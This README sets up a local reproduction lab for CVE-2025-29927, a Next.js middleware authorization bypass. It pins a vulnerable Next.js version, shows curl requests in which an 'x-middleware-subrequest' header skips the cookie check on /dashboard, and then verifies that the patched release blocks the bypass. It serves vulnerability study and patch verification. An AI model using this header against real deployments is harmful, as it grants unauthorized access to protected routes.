
Reproduction lab for CVE-2025-29927 — Next.js middleware authorization bypass (CVSS 9.1)
Minimal reproduction lab for CVE-2025-29927 — Next.js middleware authorization bypass (CVSS 9.1).
Companion to: N-Day Analysis writeup on Medium
A Next.js 15.2.2 app (vulnerable) with a cookie-gated /dashboard route. The middleware auth check can be bypassed by sending a single HTTP header — no credentials required.
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001
Step 1 — Confirm middleware blocks unauthenticated requests:
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307
Step 2 — Bypass middleware with the subrequest header:
curl -s -o /dev/null -w "%{http_code}" \
-H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
http://localhost:3001/dashboard
# → 200
Step 3 — Upgrade to the patched version and confirm the bypass is blocked:
npm install [email protected]
# Restart the dev server, then repeat Step 2
# → 307
| Route | Access |
|---|---|
/ | Public |
/login | Public |
/dashboard | Protected by middleware (requires session cookie) |
Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5